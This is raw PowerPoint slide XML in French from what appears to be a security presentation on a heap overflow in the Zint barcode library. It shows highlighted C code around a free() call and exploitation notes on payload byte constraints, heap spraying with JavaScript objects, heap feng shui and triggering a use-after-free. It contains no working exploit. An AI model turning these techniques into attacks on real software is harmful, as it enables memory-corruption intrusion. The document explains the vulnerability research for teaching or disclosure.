              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>zint_symbol_t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a1</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v2</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008000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// r6 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008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int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> v3</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008000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// r4 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>void</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bitmap</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008000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// r0</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008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p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bitmap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err="1">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>void</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a1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bitmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>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endParaRPr lang="fr-FR" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if</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bitmap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t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>free</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bitmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     a1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bitmap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FF8000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0</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p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>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p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bitmap_width</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FF8000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> a1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bitmap_height</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF8000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> bitmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1100" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="ZoneTexte 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BFA37B8-57A8-3851-B331-F1FBE7D2A5A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4326660" y="981108"/>
            <a:ext cx="3024336" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" u="sng" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Zint_Create_QrCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" u="sng" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" u="sng" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47A870E8-99D7-445B-0EB5-C66FCABD4E2D}"/>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23" name="Espace réservé du texte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07BBBA7E-2B5B-479A-2BAC-7B022D48D828}"/>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3020671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DF5D559-136C-5670-3182-0FE3DD8A713E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52ACB079-6FE0-8B89-D95B-05A8935BAC6F}"/>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1FA89F6B-9763-705B-6E7C-71B659EE8335}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>overflow</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="ZoneTexte 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8D90D40-A972-CF5E-41C0-D827203E2676}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365125" y="1202363"/>
            <a:ext cx="8509659" cy="1131079"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Charset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> de la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> réduit par</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : pas d’octets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>null</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Chaine de caractère encodée en UTF-8 : transformation 0x80 =&gt; 0xC2 0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Remplir la mémoire avec des objets JS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Trouver un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> alloué a une adresse valide pour déclencher une UAF …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Groupe 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DE2D802-8169-8799-6F07-A0742EA9CC48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2697981" y="2390085"/>
            <a:ext cx="3504700" cy="2381117"/>
            <a:chOff x="4052887" y="3462608"/>
            <a:chExt cx="4086225" cy="3267075"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="Image 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B881CB63-7486-7F44-2C9A-2E8991398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887" y="3462608"/>
              <a:ext cx="4086225" cy="3267075"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="ZoneTexte 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DAB67CC-1CDA-E45D-40F3-DED3ACC8DF7F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5735960" y="4077072"/>
              <a:ext cx="2160240" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="fr-FR" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>HEAP FENG SHUI</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="ZoneTexte 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{043E098A-3716-67B1-7066-2E01B44F8D26}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5650508" y="5517232"/>
              <a:ext cx="2331144" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="fr-FR" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>FIND ANOTHER VULNERABILITY</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="ZoneTexte 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C4B6AD0-ED8B-7AB1-8A1D-DB5FA8E6508E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4214821" y="2912003"/>
            <a:ext cx="1852809" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HEAP FENG SHUI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="ZoneTexte 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{255F314F-0101-AA4E-E938-6417B7146B34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3902362" y="3874321"/>
            <a:ext cx="2331144" cy="507831"/>
          </a:xfrm>
